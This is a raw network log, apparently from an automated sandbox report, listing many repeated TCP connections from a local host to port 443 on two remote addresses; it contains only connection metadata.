Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49730
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49729
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49726
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49728
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49727
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49733
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49732
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49735
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49734
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 13.107.219.40:443 -> 192.168.2.16:49731
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
